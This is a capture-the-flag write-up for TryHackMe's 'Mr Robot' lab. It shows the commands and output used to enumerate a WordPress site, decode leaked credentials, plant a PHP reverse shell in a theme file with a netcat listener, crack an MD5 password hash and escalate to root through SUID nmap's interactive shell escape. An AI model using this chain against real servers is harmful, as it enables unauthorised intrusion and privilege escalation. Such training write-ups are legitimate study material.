MrRobot
Mr Robot
Room link: https://tryhackme.com/room/mrrobot
Key 1
As always, for my first scan I used an aggressive NMAP scan.
ajread@aj-ubuntu:~/TryHackMe$ nmap -A [Remote IP]
Starting Nmap 7.80 ( https://nmap.org ) at 2022-02-18 23:12 EST
Nmap scan report for [Remote IP]
Host is up (0.14s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.77 secondsIt appears I am working with ssh and http/https on this box.
I used gobuster to enumerate port 80. It returned a LOT of hits. Just from looking at the website, there was a lot going on so I kind of expected that.
ajread@aj-ubuntu:~/TryHackMe$ gobuster -u [Remote IP] -w /home/ajread/resources/wordlists/SecLists/Discovery/Web-Content/common.txt
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://[Remote IP]/
[+] Threads : 10
[+] Wordlist : /home/ajread/resources/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2022/02/19 17:44:50 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/0 (Status: 301)
/Image (Status: 301)
/admin (Status: 301)
/atom (Status: 301)
/audio (Status: 301)
/blog (Status: 301)
/css (Status: 301)
/dashboard (Status: 302)
/favicon.ico (Status: 200)
/feed (Status: 301)
/images (Status: 301)
/image (Status: 301)
/index.html (Status: 200)
/index.php (Status: 301)
/intro (Status: 200)
/js (Status: 301)
/license (Status: 200)
/login (Status: 302)
/page1 (Status: 301)
/phpmyadmin (Status: 403)
/readme (Status: 200)
/rdf (Status: 301)
/render/https://www.google.com (Status: 301)
/robots (Status: 200)
/robots.txt (Status: 200)
/rss2 (Status: 301)
/rss (Status: 301)
/sitemap (Status: 200)
/sitemap.xml (Status: 200)
/video (Status: 301)
/wp-admin (Status: 301)
/wp-content (Status: 301)
/wp-includes (Status: 301)
/wp-config (Status: 200)
/wp-cron (Status: 200)
/wp-links-opml (Status: 200)
/wp-load (Status: 200)
/wp-login (Status: 200)
/wp-signup (Status: 302)
=====================================================
2022/02/19 18:02:38 Finished
=====================================================From gobuster, there appears to be a robots.txt file. I used curl to investigate the page and found that key-1-of-3.txt is referenced there.
ajread@aj-ubuntu:~/TryHackMe$ curl http://[Remote IP]/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txtI can run curl http://[Remote IP]/key-1-of-3.txt to get the first key, done!
Key 2
The output of the directory enumeration (gobuster) also pointed me to the /license directory. If I navigate to the site, it appears to supply some base64 encoded string at the bottom of the page.
ajread@aj-ubuntu:~/TryHackMe$ curl http://[Remote IP]/license
...
...
...
ZWxsaW90OkVSMjgtMDY1Mgo=The base64 encoded string decodes to elliot:ER28-0652. This looks like credentials! Also, it appears there is a login page at /wp-login. Out of curiosity, I tried the newly found credentials on the page and they worked! The site drops me into what appears to be a user blog dashboard run by Wordpress version 4.3.1. I do some research and find that I can use this method: https://www.hackingarticles.in/wordpress-reverse-shell/ to upload a reverse shell. It looks like I could also go the metasploit route. But, let's be adventerous today and try the manual way. The php reverse shell that I use is from pentest monkey on github: https://github.com/pentestmonkey/php-reverse-shell. I made sure to change the IP and port the shell to point back to me local/attack machine.
With everything in place and following the directions from the hackingarticles site, I start a netcat listener on my local machine.
ajread@aj-ubuntu:~/TryHackMe$ nc -lnvp 9999
Listening on 0.0.0.0 9999I run a curl command from my local machine to call the updated php theme that, in reality, is my php reverse shell (https://www.hackingarticles.in/wordpress-reverse-shell/).
ajread@aj-ubuntu:~$ curl http://[Remote IP]/wp-content/themes/twentyfifteen/404.phpAnd it drops me into a shell as daemon!
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
23:16:15 up 38 min, 0 users, load average: 0.00, 0.36, 1.76
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ I make sure to upgrade the shell with python.
$ python -c 'import pty;pty.spawn("/bin/bash")'
daemon@linux:/$ If I navigate to the home folder of user robot, I find some interesting files that I dont have access to, except for one.
daemon@linux:/home/robot$ ls -la
ls -la
total 16
drwxr-xr-x 2 root root 4096 Nov 13 2015 .
drwxr-xr-x 3 root root 4096 Nov 13 2015 ..
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5The password.raw-md5 appears to be an MD5 hash of the user robot's credentials. I dropped the hash into crackstation (https://crackstation.net/) and found the password for user robot. With the password, I am able to authenticate as robot and read key 2!
daemon@linux:/home/robot$ su robot
su robot
Password: [REDACTED]
robot@linux:~$ wc -c key-2-of-3.txt
wc -c key-2-of-3.txt
33 key-2-of-3.txtKey 3
Key 3 probably requires privilege escalation. I wanted to see if I could use a GTFO bin to execute a binary as root user and gain its privilege. I used find / -perm +6000 2>/dev/null to do so, which checks for files with SGID/SUID bit set.
robot@linux:~$ find / -perm +6000 2>/dev/null
find / -perm +6000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/mail-touchlock
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/screen
/usr/bin/mail-unlock
/usr/bin/mail-lock
/usr/bin/chsh
/usr/bin/crontab
/usr/bin/chfn
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/expiry
/usr/bin/dotlockfile
/usr/bin/sudo
/usr/bin/ssh-agent
/usr/bin/wall
/usr/local/bin/nmap
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/declaration
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/ca-certificates
/usr/local/share/sgml
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/misc
/usr/local/share/sgml/entities
/usr/local/share/fonts
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/lib/python3.4
/usr/local/lib/python3.4/dist-packages
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
/var/local
/var/lib/libuuid
/var/mail
/sbin/unix_chkpwdAnalyzing the output of the command, it looks like I can priv esc using nmap (/usr/local/bin/nmap) in interactive mode (https://vk9-sec.com/nmap-privilege-escalation/).
robot@linux:~$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for helpNmap has some cool commands in interactive mode that I didnt know about.
nmap> h
h
Nmap Interactive Commands:
n <nmap args> -- executes an nmap scan using the arguments given and
waits for nmap to finish. Results are printed to the
screen (of course you can still use file output commands).
! <command> -- runs shell command given in the foreground
x -- Exit Nmap
f [--spoof <fakeargs>] [--nmap_path <path>] <nmap args>
-- Executes nmap in the background (results are NOT
printed to the screen). You should generally specify a
file for results (with -oX, -oG, or -oN). If you specify
fakeargs with --spoof, Nmap will try to make those
appear in ps listings. If you wish to execute a special
version of Nmap, specify --nmap_path.
n -h -- Obtain help with Nmap syntax
h -- Prints this help screen.
Examples:
n -sS -O -v example.com/24
f --spoof "/usr/local/bin/pico -z hello.c" -sS -oN e.log example.com/24Running a command with ! at the beginning allows me to run a shell command. And like that, I can read the last key!
nmap> !wc -c /root/key-3-of-3.txt
!wc -c /root/key-3-of-3.txt
33 /root/key-3-of-3.txt
waiting to reap child : No child processesLast updated